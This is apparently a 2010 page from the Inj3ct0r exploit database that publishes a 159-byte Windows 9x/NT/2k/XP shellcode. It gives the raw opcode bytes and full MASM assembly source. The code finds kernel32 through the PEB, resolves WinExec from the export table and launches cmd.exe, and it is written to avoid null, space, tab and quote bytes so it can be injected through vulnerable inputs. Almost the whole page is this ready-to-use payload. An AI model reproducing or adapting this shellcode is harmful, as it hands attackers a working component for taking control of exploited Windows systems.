[win32] - win32 9x/NT/2k/XP Generic cmd.exe Shellcode 159 by
Posted on 30 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>win32 9x/NT/2k/XP Generic cmd.exe Shellcode 159 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 30 Sep 2010 | Exploit category: win32 | Exploit author: Pepelux | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================================== win32 9x/NT/2k/XP Generic cmd.exe Shellcode 159 bytes ===================================================== ; Windows 9x/NT/2k/XP Generic cmd.exe Shellcode ; 159 bytes ; ; free of null bytes (x00), spaces (x20), tabs (x09), quotes (x22) ; ; by Pepelux - pepeluxx[at]gmail[dot]com ; http://www.pepelux.org - http://www.enye-sec.org ; ; 33 C0 64 8B 40 30 8B 40 0C 85 C0 78 09 8B 70 1C ; AD 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 50 ; 8B 34 24 03 76 3C 8B 56 78 03 14 24 8B CA 83 C1 ; 1F 41 8B 19 03 1C 24 33 C0 8B 3B 03 3C 24 81 3F ; 57 69 6E 45 75 0F 66 81 7F 04 78 65 75 07 66 83 ; 7F 06 63 74 0A 90 83 C3 04 40 3B 42 18 75 DA 8B ; 72 24 03 34 24 33 C9 66 8B 0C 46 8B 7A 1C 03 3C ; 24 8B 04 8F 03 04 24 8B EC 32 D2 83 EC 0C C7 45 ; F7 63 6D 64 2E 66 C7 45 FB 65 78 C6 45 FD 65 88 ; 55 FE 8D 4D F7 33 DB B3 05 53 51 8B D8 FF D3 .386 .model flat, stdcall ;32 bit memory model option casemap :none ;case sensitive assume fs:nothing include windows.inc include kernel32.inc includelib masm32.lib includelib kernel32.lib .code start: ; ************************************ ; Search for kernel32.dll base address ; ************************************ busca_kernel32: xor eax, eax mov eax, fs:[eax+30h] ; link to PEB mov eax, [eax+0ch] ; link to data struct test eax, eax js busca_kernel32_9x ; if FS=1 then Windows 9x else NT, XP, ... busca_kernel32_nt: mov esi, [eax+1ch] ; first entry lodsd ; next entry mov eax, [eax+08h] ; eax=base address jmp fin_kernel32 busca_kernel32_9x: mov eax, [eax+34h] lea eax, [eax+7ch] mov eax, [eax+3ch] ; eax=base address fin_kernel32: push eax ; ************************************************** ; Search for WinExec using kernel32.dll base address ; ************************************************** busca_funcion: mov esi, [esp] ; link to kernel32.dll base address add esi, [esi+03Ch] ; link to PE signature mov edx, [esi+078h] ; link to Export table add edx, [esp] ; adding base address mov ecx, edx ; avoid 20h opcode (space) add ecx, 1fh inc ecx mov ebx, [ecx] ; link to array AddressOfNames add ebx, [esp] xor eax, eax ; index of AddressOfNames bucle_funcion: ; search WinExec function mov edi, [ebx] add edi, [esp] cmp dword ptr [edi], 456E6957h ; EniW = WinE in the other way jnz funcion_no_encontrada cmp word ptr [edi + 4], 6578h ; ex = xe in the other way jnz funcion_no_encontrada cmp word ptr [edi + 6], 63h ; c je funcion_encontrada funcion_no_encontrada: nop ; NOP to avoid 09h opcode (tab) add ebx, 4 inc eax cmp eax, dword ptr [edx+18h] jnz bucle_funcion funcion_encontrada: mov esi, dword ptr [edx + 24h] ; link to ordinals table add esi, [esp] ; adding base address xor ecx, ecx mov cx, word ptr [esi + 2 * eax] ; cx = function number mov edi, dword ptr [edx + 1ch] ; link to address table add edi, [esp] ; adding base address mov eax, dword ptr [edi + 4 * ecx] ; link to found function add eax, [esp] ; adding base address ; *************** ; Running cmd.exe ; *************** mov ebp, esp xor dl, dl sub esp, 0ch ; substract 0ch bytes to esp to save 'cmd.exe' string mov dword ptr [ebp-09h], 2e646d63h ; .dmc = cmd. in the other way mov word ptr [ebp-05h], 7865h ; xe = ex in the other way mov byte ptr [ebp-03h], 65h ; e mov byte ptr [ebp-02h], dl ; 0x00 (end of string) lea ecx, [ebp-09h] ; eax=link to cmd.exe string xor ebx, ebx mov bl, 5 ; SW_SHOW push ebx push ecx mov ebx, eax call ebx ; call to WinExec invoke ExitProcess, 0 end start # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-30]</pre></body></html>
